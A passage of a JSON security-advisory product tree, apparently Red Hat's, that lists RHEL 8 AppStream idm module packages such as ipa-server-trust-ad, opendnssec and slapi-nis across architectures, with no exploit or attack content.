"relates_to_product_reference": "AppStream-8.10.0.Z.MAIN.EUS:idm:DL1:8100020240416171943:823393f5"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "ipa-server-trust-ad-0:4.9.13-9.module+el8.10.0+21691+df63127d.aarch64 as a component of idm:DL1:8100020240416171943:823393f5 as a component of Red Hat Enterprise Linux AppStream (v. 8)",
"product_id": "AppStream-8.10.0.Z.MAIN.EUS:idm:DL1:8100020240416171943:823393f5:ipa-server-trust-ad-0:4.9.13-9.module+el8.10.0+21691+df63127d.aarch64"
},
"product_reference": "ipa-server-trust-ad-0:4.9.13-9.module+el8.10.0+21691+df63127d.aarch64",
"relates_to_product_reference": "AppStream-8.10.0.Z.MAIN.EUS:idm:DL1:8100020240416171943:823393f5"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "ipa-server-trust-ad-0:4.9.13-9.module+el8.10.0+21691+df63127d.ppc64le as a component of idm:DL1:8100020240416171943:823393f5 as a component of Red Hat Enterprise Linux AppStream (v. 8)",
"product_id": "AppStream-8.10.0.Z.MAIN.EUS:idm:DL1:8100020240416171943:823393f5:ipa-server-trust-ad-0:4.9.13-9.module+el8.10.0+21691+df63127d.ppc64le"
},
"product_reference": "ipa-server-trust-ad-0:4.9.13-9.module+el8.10.0+21691+df63127d.ppc64le",
"relates_to_product_reference": "AppStream-8.10.0.Z.MAIN.EUS:idm:DL1:8100020240416171943:823393f5"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "ipa-server-trust-ad-0:4.9.13-9.module+el8.10.0+21691+df63127d.s390x as a component of idm:DL1:8100020240416171943:823393f5 as a component of Red Hat Enterprise Linux AppStream (v. 8)",
"product_id": "AppStream-8.10.0.Z.MAIN.EUS:idm:DL1:8100020240416171943:823393f5:ipa-server-trust-ad-0:4.9.13-9.module+el8.10.0+21691+df63127d.s390x"
},
"product_reference": "ipa-server-trust-ad-0:4.9.13-9.module+el8.10.0+21691+df63127d.s390x",
"relates_to_product_reference": "AppStream-8.10.0.Z.MAIN.EUS:idm:DL1:8100020240416171943:823393f5"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "ipa-server-trust-ad-0:4.9.13-9.module+el8.10.0+21691+df63127d.x86_64 as a component of idm:DL1:8100020240416171943:823393f5 as a component of Red Hat Enterprise Linux AppStream (v. 8)",
"product_id": "AppStream-8.10.0.Z.MAIN.EUS:idm:DL1:8100020240416171943:823393f5:ipa-server-trust-ad-0:4.9.13-9.module+el8.10.0+21691+df63127d.x86_64"
},
"product_reference": "ipa-server-trust-ad-0:4.9.13-9.module+el8.10.0+21691+df63127d.x86_64",
"relates_to_product_reference": "AppStream-8.10.0.Z.MAIN.EUS:idm:DL1:8100020240416171943:823393f5"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "ipa-server-trust-ad-debuginfo-0:4.9.13-9.module+el8.10.0+21691+df63127d.aarch64 as a component of idm:DL1:8100020240416171943:823393f5 as a component of Red Hat Enterprise Linux AppStream (v. 8)",
"product_id": "AppStream-8.10.0.Z.MAIN.EUS:idm:DL1:8100020240416171943:823393f5:ipa-server-trust-ad-debuginfo-0:4.9.13-9.module+el8.10.0+21691+df63127d.aarch64"
},
"product_reference": "ipa-server-trust-ad-debuginfo-0:4.9.13-9.module+el8.10.0+21691+df63127d.aarch64",
"relates_to_product_reference": "AppStream-8.10.0.Z.MAIN.EUS:idm:DL1:8100020240416171943:823393f5"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "ipa-server-trust-ad-debuginfo-0:4.9.13-9.module+el8.10.0+21691+df63127d.ppc64le as a component of idm:DL1:8100020240416171943:823393f5 as a component of Red Hat Enterprise Linux AppStream (v. 8)",
"product_id": "AppStream-8.10.0.Z.MAIN.EUS:idm:DL1:8100020240416171943:823393f5:ipa-server-trust-ad-debuginfo-0:4.9.13-9.module+el8.10.0+21691+df63127d.ppc64le"
},
"product_reference": "ipa-server-trust-ad-debuginfo-0:4.9.13-9.module+el8.10.0+21691+df63127d.ppc64le",
"relates_to_product_reference": "AppStream-8.10.0.Z.MAIN.EUS:idm:DL1:8100020240416171943:823393f5"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "ipa-server-trust-ad-debuginfo-0:4.9.13-9.module+el8.10.0+21691+df63127d.s390x as a component of idm:DL1:8100020240416171943:823393f5 as a component of Red Hat Enterprise Linux AppStream (v. 8)",
"product_id": "AppStream-8.10.0.Z.MAIN.EUS:idm:DL1:8100020240416171943:823393f5:ipa-server-trust-ad-debuginfo-0:4.9.13-9.module+el8.10.0+21691+df63127d.s390x"
},
"product_reference": "ipa-server-trust-ad-debuginfo-0:4.9.13-9.module+el8.10.0+21691+df63127d.s390x",
"relates_to_product_reference": "AppStream-8.10.0.Z.MAIN.EUS:idm:DL1:8100020240416171943:823393f5"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "ipa-server-trust-ad-debuginfo-0:4.9.13-9.module+el8.10.0+21691+df63127d.x86_64 as a component of idm:DL1:8100020240416171943:823393f5 as a component of Red Hat Enterprise Linux AppStream (v. 8)",
"product_id": "AppStream-8.10.0.Z.MAIN.EUS:idm:DL1:8100020240416171943:823393f5:ipa-server-trust-ad-debuginfo-0:4.9.13-9.module+el8.10.0+21691+df63127d.x86_64"
},
"product_reference": "ipa-server-trust-ad-debuginfo-0:4.9.13-9.module+el8.10.0+21691+df63127d.x86_64",
"relates_to_product_reference": "AppStream-8.10.0.Z.MAIN.EUS:idm:DL1:8100020240416171943:823393f5"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "opendnssec-0:2.1.7-1.module+el8.9.0+18911+94941f82.aarch64 as a component of idm:DL1:8100020240416171943:823393f5 as a component of Red Hat Enterprise Linux AppStream (v. 8)",
"product_id": "AppStream-8.10.0.Z.MAIN.EUS:idm:DL1:8100020240416171943:823393f5:opendnssec-0:2.1.7-1.module+el8.9.0+18911+94941f82.aarch64"
},
"product_reference": "opendnssec-0:2.1.7-1.module+el8.9.0+18911+94941f82.aarch64",
"relates_to_product_reference": "AppStream-8.10.0.Z.MAIN.EUS:idm:DL1:8100020240416171943:823393f5"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "opendnssec-0:2.1.7-1.module+el8.9.0+18911+94941f82.ppc64le as a component of idm:DL1:8100020240416171943:823393f5 as a component of Red Hat Enterprise Linux AppStream (v. 8)",
"product_id": "AppStream-8.10.0.Z.MAIN.EUS:idm:DL1:8100020240416171943:823393f5:opendnssec-0:2.1.7-1.module+el8.9.0+18911+94941f82.ppc64le"
},
"product_reference": "opendnssec-0:2.1.7-1.module+el8.9.0+18911+94941f82.ppc64le",
"relates_to_product_reference": "AppStream-8.10.0.Z.MAIN.EUS:idm:DL1:8100020240416171943:823393f5"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "opendnssec-0:2.1.7-1.module+el8.9.0+18911+94941f82.s390x as a component of idm:DL1:8100020240416171943:823393f5 as a component of Red Hat Enterprise Linux AppStream (v. 8)",
"product_id": "AppStream-8.10.0.Z.MAIN.EUS:idm:DL1:8100020240416171943:823393f5:opendnssec-0:2.1.7-1.module+el8.9.0+18911+94941f82.s390x"
},
"product_reference": "opendnssec-0:2.1.7-1.module+el8.9.0+18911+94941f82.s390x",
"relates_to_product_reference": "AppStream-8.10.0.Z.MAIN.EUS:idm:DL1:8100020240416171943:823393f5"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "opendnssec-0:2.1.7-1.module+el8.9.0+18911+94941f82.src as a component of idm:DL1:8100020240416171943:823393f5 as a component of Red Hat Enterprise Linux AppStream (v. 8)",
"product_id": "AppStream-8.10.0.Z.MAIN.EUS:idm:DL1:8100020240416171943:823393f5:opendnssec-0:2.1.7-1.module+el8.9.0+18911+94941f82.src"
},
"product_reference": "opendnssec-0:2.1.7-1.module+el8.9.0+18911+94941f82.src",
"relates_to_product_reference": "AppStream-8.10.0.Z.MAIN.EUS:idm:DL1:8100020240416171943:823393f5"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "opendnssec-0:2.1.7-1.module+el8.9.0+18911+94941f82.x86_64 as a component of idm:DL1:8100020240416171943:823393f5 as a component of Red Hat Enterprise Linux AppStream (v. 8)",
"product_id": "AppStream-8.10.0.Z.MAIN.EUS:idm:DL1:8100020240416171943:823393f5:opendnssec-0:2.1.7-1.module+el8.9.0+18911+94941f82.x86_64"
},
"product_reference": "opendnssec-0:2.1.7-1.module+el8.9.0+18911+94941f82.x86_64",
"relates_to_product_reference": "AppStream-8.10.0.Z.MAIN.EUS:idm:DL1:8100020240416171943:823393f5"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "opendnssec-debuginfo-0:2.1.7-1.module+el8.9.0+18911+94941f82.aarch64 as a component of idm:DL1:8100020240416171943:823393f5 as a component of Red Hat Enterprise Linux AppStream (v. 8)",
"product_id": "AppStream-8.10.0.Z.MAIN.EUS:idm:DL1:8100020240416171943:823393f5:opendnssec-debuginfo-0:2.1.7-1.module+el8.9.0+18911+94941f82.aarch64"
},
"product_reference": "opendnssec-debuginfo-0:2.1.7-1.module+el8.9.0+18911+94941f82.aarch64",
"relates_to_product_reference": "AppStream-8.10.0.Z.MAIN.EUS:idm:DL1:8100020240416171943:823393f5"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "opendnssec-debuginfo-0:2.1.7-1.module+el8.9.0+18911+94941f82.ppc64le as a component of idm:DL1:8100020240416171943:823393f5 as a component of Red Hat Enterprise Linux AppStream (v. 8)",
"product_id": "AppStream-8.10.0.Z.MAIN.EUS:idm:DL1:8100020240416171943:823393f5:opendnssec-debuginfo-0:2.1.7-1.module+el8.9.0+18911+94941f82.ppc64le"
},
"product_reference": "opendnssec-debuginfo-0:2.1.7-1.module+el8.9.0+18911+94941f82.ppc64le",
"relates_to_product_reference": "AppStream-8.10.0.Z.MAIN.EUS:idm:DL1:8100020240416171943:823393f5"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "opendnssec-debuginfo-0:2.1.7-1.module+el8.9.0+18911+94941f82.s390x as a component of idm:DL1:8100020240416171943:823393f5 as a component of Red Hat Enterprise Linux AppStream (v. 8)",
"product_id": "AppStream-8.10.0.Z.MAIN.EUS:idm:DL1:8100020240416171943:823393f5:opendnssec-debuginfo-0:2.1.7-1.module+el8.9.0+18911+94941f82.s390x"
},
"product_reference": "opendnssec-debuginfo-0:2.1.7-1.module+el8.9.0+18911+94941f82.s390x",
"relates_to_product_reference": "AppStream-8.10.0.Z.MAIN.EUS:idm:DL1:8100020240416171943:823393f5"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "opendnssec-debuginfo-0:2.1.7-1.module+el8.9.0+18911+94941f82.x86_64 as a component of idm:DL1:8100020240416171943:823393f5 as a component of Red Hat Enterprise Linux AppStream (v. 8)",
"product_id": "AppStream-8.10.0.Z.MAIN.EUS:idm:DL1:8100020240416171943:823393f5:opendnssec-debuginfo-0:2.1.7-1.module+el8.9.0+18911+94941f82.x86_64"
},
"product_reference": "opendnssec-debuginfo-0:2.1.7-1.module+el8.9.0+18911+94941f82.x86_64",
"relates_to_product_reference": "AppStream-8.10.0.Z.MAIN.EUS:idm:DL1:8100020240416171943:823393f5"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "opendnssec-debugsource-0:2.1.7-1.module+el8.9.0+18911+94941f82.aarch64 as a component of idm:DL1:8100020240416171943:823393f5 as a component of Red Hat Enterprise Linux AppStream (v. 8)",
"product_id": "AppStream-8.10.0.Z.MAIN.EUS:idm:DL1:8100020240416171943:823393f5:opendnssec-debugsource-0:2.1.7-1.module+el8.9.0+18911+94941f82.aarch64"
},
"product_reference": "opendnssec-debugsource-0:2.1.7-1.module+el8.9.0+18911+94941f82.aarch64",
"relates_to_product_reference": "AppStream-8.10.0.Z.MAIN.EUS:idm:DL1:8100020240416171943:823393f5"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "opendnssec-debugsource-0:2.1.7-1.module+el8.9.0+18911+94941f82.ppc64le as a component of idm:DL1:8100020240416171943:823393f5 as a component of Red Hat Enterprise Linux AppStream (v. 8)",
"product_id": "AppStream-8.10.0.Z.MAIN.EUS:idm:DL1:8100020240416171943:823393f5:opendnssec-debugsource-0:2.1.7-1.module+el8.9.0+18911+94941f82.ppc64le"
},
"product_reference": "opendnssec-debugsource-0:2.1.7-1.module+el8.9.0+18911+94941f82.ppc64le",
"relates_to_product_reference": "AppStream-8.10.0.Z.MAIN.EUS:idm:DL1:8100020240416171943:823393f5"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "opendnssec-debugsource-0:2.1.7-1.module+el8.9.0+18911+94941f82.s390x as a component of idm:DL1:8100020240416171943:823393f5 as a component of Red Hat Enterprise Linux AppStream (v. 8)",
"product_id": "AppStream-8.10.0.Z.MAIN.EUS:idm:DL1:8100020240416171943:823393f5:opendnssec-debugsource-0:2.1.7-1.module+el8.9.0+18911+94941f82.s390x"
},
"product_reference": "opendnssec-debugsource-0:2.1.7-1.module+el8.9.0+18911+94941f82.s390x",
"relates_to_product_reference": "AppStream-8.10.0.Z.MAIN.EUS:idm:DL1:8100020240416171943:823393f5"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "opendnssec-debugsource-0:2.1.7-1.module+el8.9.0+18911+94941f82.x86_64 as a component of idm:DL1:8100020240416171943:823393f5 as a component of Red Hat Enterprise Linux AppStream (v. 8)",
"product_id": "AppStream-8.10.0.Z.MAIN.EUS:idm:DL1:8100020240416171943:823393f5:opendnssec-debugsource-0:2.1.7-1.module+el8.9.0+18911+94941f82.x86_64"
},
"product_reference": "opendnssec-debugsource-0:2.1.7-1.module+el8.9.0+18911+94941f82.x86_64",
"relates_to_product_reference": "AppStream-8.10.0.Z.MAIN.EUS:idm:DL1:8100020240416171943:823393f5"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "python-jwcrypto-0:0.5.0-2.module+el8.10.0+21691+df63127d.src as a component of idm:DL1:8100020240416171943:823393f5 as a component of Red Hat Enterprise Linux AppStream (v. 8)",
"product_id": "AppStream-8.10.0.Z.MAIN.EUS:idm:DL1:8100020240416171943:823393f5:python-jwcrypto-0:0.5.0-2.module+el8.10.0+21691+df63127d.src"
},
"product_reference": "python-jwcrypto-0:0.5.0-2.module+el8.10.0+21691+df63127d.src",
"relates_to_product_reference": "AppStream-8.10.0.Z.MAIN.EUS:idm:DL1:8100020240416171943:823393f5"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "python-kdcproxy-0:0.4-5.module+el8.9.0+18911+94941f82.src as a component of idm:DL1:8100020240416171943:823393f5 as a component of Red Hat Enterprise Linux AppStream (v. 8)",
"product_id": "AppStream-8.10.0.Z.MAIN.EUS:idm:DL1:8100020240416171943:823393f5:python-kdcproxy-0:0.4-5.module+el8.9.0+18911+94941f82.src"
},
"product_reference": "python-kdcproxy-0:0.4-5.module+el8.9.0+18911+94941f82.src",
"relates_to_product_reference": "AppStream-8.10.0.Z.MAIN.EUS:idm:DL1:8100020240416171943:823393f5"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "python-qrcode-0:5.1-12.module+el8.9.0+18911+94941f82.src as a component of idm:DL1:8100020240416171943:823393f5 as a component of Red Hat Enterprise Linux AppStream (v. 8)",
"product_id": "AppStream-8.10.0.Z.MAIN.EUS:idm:DL1:8100020240416171943:823393f5:python-qrcode-0:5.1-12.module+el8.9.0+18911+94941f82.src"
},
"product_reference": "python-qrcode-0:5.1-12.module+el8.9.0+18911+94941f82.src",
"relates_to_product_reference": "AppStream-8.10.0.Z.MAIN.EUS:idm:DL1:8100020240416171943:823393f5"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "python-yubico-0:1.3.2-9.1.module+el8.9.0+18911+94941f82.src as a component of idm:DL1:8100020240416171943:823393f5 as a component of Red Hat Enterprise Linux AppStream (v. 8)",
"product_id": "AppStream-8.10.0.Z.MAIN.EUS:idm:DL1:8100020240416171943:823393f5:python-yubico-0:1.3.2-9.1.module+el8.9.0+18911+94941f82.src"
},
"product_reference": "python-yubico-0:1.3.2-9.1.module+el8.9.0+18911+94941f82.src",
"relates_to_product_reference": "AppStream-8.10.0.Z.MAIN.EUS:idm:DL1:8100020240416171943:823393f5"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "python3-custodia-0:0.6.0-3.module+el8.9.0+18911+94941f82.noarch as a component of idm:DL1:8100020240416171943:823393f5 as a component of Red Hat Enterprise Linux AppStream (v. 8)",
"product_id": "AppStream-8.10.0.Z.MAIN.EUS:idm:DL1:8100020240416171943:823393f5:python3-custodia-0:0.6.0-3.module+el8.9.0+18911+94941f82.noarch"
},
"product_reference": "python3-custodia-0:0.6.0-3.module+el8.9.0+18911+94941f82.noarch",
"relates_to_product_reference": "AppStream-8.10.0.Z.MAIN.EUS:idm:DL1:8100020240416171943:823393f5"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "python3-ipaclient-0:4.9.13-9.module+el8.10.0+21691+df63127d.noarch as a component of idm:DL1:8100020240416171943:823393f5 as a component of Red Hat Enterprise Linux AppStream (v. 8)",
"product_id": "AppStream-8.10.0.Z.MAIN.EUS:idm:DL1:8100020240416171943:823393f5:python3-ipaclient-0:4.9.13-9.module+el8.10.0+21691+df63127d.noarch"
},
"product_reference": "python3-ipaclient-0:4.9.13-9.module+el8.10.0+21691+df63127d.noarch",
"relates_to_product_reference": "AppStream-8.10.0.Z.MAIN.EUS:idm:DL1:8100020240416171943:823393f5"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "python3-ipalib-0:4.9.13-9.module+el8.10.0+21691+df63127d.noarch as a component of idm:DL1:8100020240416171943:823393f5 as a component of Red Hat Enterprise Linux AppStream (v. 8)",
"product_id": "AppStream-8.10.0.Z.MAIN.EUS:idm:DL1:8100020240416171943:823393f5:python3-ipalib-0:4.9.13-9.module+el8.10.0+21691+df63127d.noarch"
},
"product_reference": "python3-ipalib-0:4.9.13-9.module+el8.10.0+21691+df63127d.noarch",
"relates_to_product_reference": "AppStream-8.10.0.Z.MAIN.EUS:idm:DL1:8100020240416171943:823393f5"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "python3-ipaserver-0:4.9.13-9.module+el8.10.0+21691+df63127d.noarch as a component of idm:DL1:8100020240416171943:823393f5 as a component of Red Hat Enterprise Linux AppStream (v. 8)",
"product_id": "AppStream-8.10.0.Z.MAIN.EUS:idm:DL1:8100020240416171943:823393f5:python3-ipaserver-0:4.9.13-9.module+el8.10.0+21691+df63127d.noarch"
},
"product_reference": "python3-ipaserver-0:4.9.13-9.module+el8.10.0+21691+df63127d.noarch",
"relates_to_product_reference": "AppStream-8.10.0.Z.MAIN.EUS:idm:DL1:8100020240416171943:823393f5"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "python3-ipatests-0:4.9.13-9.module+el8.10.0+21691+df63127d.noarch as a component of idm:DL1:8100020240416171943:823393f5 as a component of Red Hat Enterprise Linux AppStream (v. 8)",
"product_id": "AppStream-8.10.0.Z.MAIN.EUS:idm:DL1:8100020240416171943:823393f5:python3-ipatests-0:4.9.13-9.module+el8.10.0+21691+df63127d.noarch"
},
"product_reference": "python3-ipatests-0:4.9.13-9.module+el8.10.0+21691+df63127d.noarch",
"relates_to_product_reference": "AppStream-8.10.0.Z.MAIN.EUS:idm:DL1:8100020240416171943:823393f5"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "python3-jwcrypto-0:0.5.0-2.module+el8.10.0+21691+df63127d.noarch as a component of idm:DL1:8100020240416171943:823393f5 as a component of Red Hat Enterprise Linux AppStream (v. 8)",
"product_id": "AppStream-8.10.0.Z.MAIN.EUS:idm:DL1:8100020240416171943:823393f5:python3-jwcrypto-0:0.5.0-2.module+el8.10.0+21691+df63127d.noarch"
},
"product_reference": "python3-jwcrypto-0:0.5.0-2.module+el8.10.0+21691+df63127d.noarch",
"relates_to_product_reference": "AppStream-8.10.0.Z.MAIN.EUS:idm:DL1:8100020240416171943:823393f5"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "python3-kdcproxy-0:0.4-5.module+el8.9.0+18911+94941f82.noarch as a component of idm:DL1:8100020240416171943:823393f5 as a component of Red Hat Enterprise Linux AppStream (v. 8)",
"product_id": "AppStream-8.10.0.Z.MAIN.EUS:idm:DL1:8100020240416171943:823393f5:python3-kdcproxy-0:0.4-5.module+el8.9.0+18911+94941f82.noarch"
},
"product_reference": "python3-kdcproxy-0:0.4-5.module+el8.9.0+18911+94941f82.noarch",
"relates_to_product_reference": "AppStream-8.10.0.Z.MAIN.EUS:idm:DL1:8100020240416171943:823393f5"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "python3-pyusb-0:1.0.0-9.1.module+el8.9.0+18911+94941f82.noarch as a component of idm:DL1:8100020240416171943:823393f5 as a component of Red Hat Enterprise Linux AppStream (v. 8)",
"product_id": "AppStream-8.10.0.Z.MAIN.EUS:idm:DL1:8100020240416171943:823393f5:python3-pyusb-0:1.0.0-9.1.module+el8.9.0+18911+94941f82.noarch"
},
"product_reference": "python3-pyusb-0:1.0.0-9.1.module+el8.9.0+18911+94941f82.noarch",
"relates_to_product_reference": "AppStream-8.10.0.Z.MAIN.EUS:idm:DL1:8100020240416171943:823393f5"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "python3-qrcode-0:5.1-12.module+el8.9.0+18911+94941f82.noarch as a component of idm:DL1:8100020240416171943:823393f5 as a component of Red Hat Enterprise Linux AppStream (v. 8)",
"product_id": "AppStream-8.10.0.Z.MAIN.EUS:idm:DL1:8100020240416171943:823393f5:python3-qrcode-0:5.1-12.module+el8.9.0+18911+94941f82.noarch"
},
"product_reference": "python3-qrcode-0:5.1-12.module+el8.9.0+18911+94941f82.noarch",
"relates_to_product_reference": "AppStream-8.10.0.Z.MAIN.EUS:idm:DL1:8100020240416171943:823393f5"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "python3-qrcode-core-0:5.1-12.module+el8.9.0+18911+94941f82.noarch as a component of idm:DL1:8100020240416171943:823393f5 as a component of Red Hat Enterprise Linux AppStream (v. 8)",
"product_id": "AppStream-8.10.0.Z.MAIN.EUS:idm:DL1:8100020240416171943:823393f5:python3-qrcode-core-0:5.1-12.module+el8.9.0+18911+94941f82.noarch"
},
"product_reference": "python3-qrcode-core-0:5.1-12.module+el8.9.0+18911+94941f82.noarch",
"relates_to_product_reference": "AppStream-8.10.0.Z.MAIN.EUS:idm:DL1:8100020240416171943:823393f5"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "python3-yubico-0:1.3.2-9.1.module+el8.9.0+18911+94941f82.noarch as a component of idm:DL1:8100020240416171943:823393f5 as a component of Red Hat Enterprise Linux AppStream (v. 8)",
"product_id": "AppStream-8.10.0.Z.MAIN.EUS:idm:DL1:8100020240416171943:823393f5:python3-yubico-0:1.3.2-9.1.module+el8.9.0+18911+94941f82.noarch"
},
"product_reference": "python3-yubico-0:1.3.2-9.1.module+el8.9.0+18911+94941f82.noarch",
"relates_to_product_reference": "AppStream-8.10.0.Z.MAIN.EUS:idm:DL1:8100020240416171943:823393f5"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "pyusb-0:1.0.0-9.1.module+el8.9.0+18911+94941f82.src as a component of idm:DL1:8100020240416171943:823393f5 as a component of Red Hat Enterprise Linux AppStream (v. 8)",
"product_id": "AppStream-8.10.0.Z.MAIN.EUS:idm:DL1:8100020240416171943:823393f5:pyusb-0:1.0.0-9.1.module+el8.9.0+18911+94941f82.src"
},
"product_reference": "pyusb-0:1.0.0-9.1.module+el8.9.0+18911+94941f82.src",
"relates_to_product_reference": "AppStream-8.10.0.Z.MAIN.EUS:idm:DL1:8100020240416171943:823393f5"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "slapi-nis-0:0.60.0-4.module+el8.10.0+20723+03062ebd.aarch64 as a component of idm:DL1:8100020240416171943:823393f5 as a component of Red Hat Enterprise Linux AppStream (v. 8)",
"product_id": "AppStream-8.10.0.Z.MAIN.EUS:idm:DL1:8100020240416171943:823393f5:slapi-nis-0:0.60.0-4.module+el8.10.0+20723+03062ebd.aarch64"
},
"product_reference": "slapi-nis-0:0.60.0-4.module+el8.10.0+20723+03062ebd.aarch64",
"relates_to_product_reference": "AppStream-8.10.0.Z.MAIN.EUS:idm:DL1:8100020240416171943:823393f5"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "slapi-nis-0:0.60.0-4.module+el8.10.0+20723+03062ebd.ppc64le as a component of idm:DL1:8100020240416171943:823393f5 as a component of Red Hat Enterprise Linux AppStream (v. 8)",
"product_id": "AppStream-8.10.0.Z.MAIN.EUS:idm:DL1:8100020240416171943:823393f5:slapi-nis-0:0.60.0-4.module+el8.10.0+20723+03062ebd.ppc64le"
},
"product_reference": "slapi-nis-0:0.60.0-4.module+el8.10.0+20723+03062ebd.ppc64le",
"relates_to_product_reference": "AppStream-8.10.0.Z.MAIN.EUS:idm:DL1:8100020240416171943:823393f5"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "slapi-nis-0:0.60.0-4.module+el8.10.0+20723+03062ebd.s390x as a component of idm:DL1:8100020240416171943:823393f5 as a component of Red Hat Enterprise Linux AppStream (v. 8)",
"product_id": "AppStream-8.10.0.Z.MAIN.EUS:idm:DL1:8100020240416171943:823393f5:slapi-nis-0:0.60.0-4.module+el8.10.0+20723+03062ebd.s390x"
},
"product_reference": "slapi-nis-0:0.60.0-4.module+el8.10.0+20723+03062ebd.s390x",
"relates_to_product_reference": "AppStream-8.10.0.Z.MAIN.EUS:idm:DL1:8100020240416171943:823393f5"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "slapi-nis-0:0.60.0-4.module+el8.10.0+20723+03062ebd.src as a component of idm:DL1:8100020240416171943:823393f5 as a component of Red Hat Enterprise Linux AppStream (v. 8)",
"product_id": "AppStream-8.10.0.Z.MAIN.EUS:idm:DL1:8100020240416171943:823393f5:slapi-nis-0:0.60.0-4.module+el8.10.0+20723+03062ebd.src"
},
"product_reference": "slapi-nis-0:0.60.0-4.module+el8.10.0+20723+03062ebd.src",
"relates_to_product_reference": "AppStream-8.10.0.Z.MAIN.EUS:idm:DL1:8100020240416171943:823393f5"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "slapi-nis-0:0.60.0-4.module+el8.10.0+20723+03062ebd.x86_64 as a component of idm:DL1:8100020240416171943:823393f5 as a component of Red Hat Enterprise Linux AppStream (v. 8)",
"product_id": "AppStream-8.10.0.Z.MAIN.EUS:idm:DL1:8100020240416171943:823393f5:slapi-nis-0:0.60.0-4.module+el8.10.0+20723+03062ebd.x86_64"
},
"product_reference": "slapi-nis-0:0.60.0-4.module+el8.10.0+20723+03062ebd.x86_64",
"relates_to_product_reference": "AppStream-8.10.0.Z.MAIN.EUS:idm:DL1:8100020240416171943:823393f5"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "slapi-nis-debuginfo-0:0.60.0-4.module+el8.10.0+20723+03062ebd.aarch64 as a component of idm:DL1:8100020240416171943:823393f5 as a component of Red Hat Enterprise Linux AppStream (v. 8)",
"product_id": "AppStream-8.10.0.Z.MAIN.EUS:idm:DL1:8100020240416171943:823393f5:slapi-nis-debuginfo-0:0.60.0-4.module+el8.10.0+20723+03062ebd.aarch64"
},
"product_reference": "slapi-nis-debuginfo-0:0.60.0-4.module+el8.10.0+20723+03062ebd.aarch64",
"relates_to_product_reference": "AppStream-8.10.0.Z.MAIN.EUS:idm:DL1:8100020240416171943:823393f5"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "slapi-nis-debuginfo-0:0.60.0-4.module+el8.10.0+20723+03062ebd.ppc64le as a component of idm:DL1:8100020240416171943:823393f5 as a component of Red Hat Enterprise Linux AppStream (v. 8)",
"product_id": "AppStream-8.10.0.Z.MAIN.EUS:idm:DL1:8100020240416171943:823393f5:slapi-nis-debuginfo-0:0.60.0-4.module+el8.10.0+20723+03062ebd.ppc64le"
},
"product_reference": "slapi-nis-debuginfo-0:0.60.0-4.module+el8.10.0+20723+03062ebd.ppc64le",
"relates_to_product_reference": "AppStream-8.10.0.Z.MAIN.EUS:idm:DL1:8100020240416171943:823393f5"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "slapi-nis-debuginfo-0:0.60.0-4.module+el8.10.0+20723+03062ebd.s390x as a component of idm:DL1:8100020240416171943:823393f5 as a component of Red Hat Enterprise Linux AppStream (v. 8)",
"product_id": "AppStream-8.10.0.Z.MAIN.EUS:idm:DL1:8100020240416171943:823393f5:slapi-nis-debuginfo-0:0.60.0-4.module+el8.10.0+20723+03062ebd.s390x"
},
"product_reference": "slapi-nis-debuginfo-0:0.60.0-4.module+el8.10.0+20723+03062ebd.s390x",
"relates_to_product_reference": "AppStream-8.10.0.Z.MAIN.EUS:idm:DL1:8100020240416171943:823393f5"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "slapi-nis-debuginfo-0:0.60.0-4.module+el8.10.0+20723+03062ebd.x86_64 as a component of idm:DL1:8100020240416171943:823393f5 as a component of Red Hat Enterprise Linux AppStream (v. 8)",
"product_id": "AppStream-8.10.0.Z.MAIN.EUS:idm:DL1:8100020240416171943:823393f5:slapi-nis-debuginfo-0:0.60.0-4.module+el8.10.0+20723+03062ebd.x86_64"
},
"product_reference": "slapi-nis-debuginfo-0:0.60.0-4.module+el8.10.0+20723+03062ebd.x86_64",
"relates_to_product_reference": "AppStream-8.10.0.Z.MAIN.EUS:idm:DL1:8100020240416171943:823393f5"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "slapi-nis-debugsource-0:0.60.0-4.module+el8.10.0+20723+03062ebd.aarch64 as a component of idm:DL1:8100020240416171943:823393f5 as a component of Red Hat Enterprise Linux AppStream (v. 8)",
